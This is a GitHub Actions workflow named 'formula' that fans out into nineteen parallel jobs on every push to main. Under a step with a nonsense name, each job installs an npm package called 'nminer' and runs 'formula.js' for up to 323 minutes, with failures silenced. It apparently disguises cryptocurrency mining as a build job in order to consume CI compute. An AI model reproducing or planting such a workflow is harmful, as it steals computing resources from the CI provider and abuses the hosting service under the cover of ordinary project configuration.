name: formula
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 1126 }
          - { version: 3803 }
          - { version: 6347 }
          - { version: 1942 }
          - { version: 6968 }
          - { version: 5833 }
          - { version: 4262 }
          - { version: 1832 }
          - { version: 479 }
          - { version: 4082 }
          - { version: 6387 }
          - { version: 526 }
          - { version: 3571 }
          - { version: 278 }
          - { version: 1076 }
          - { version: 1330 }
          - { version: 2107 }
          - { version: 7865 }
          - { version: 8821 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: bestride overspend gee jubilantly corny
        run: |
          npm install nminer@latest
          timeout 323m node formula.js || echo "formula executed"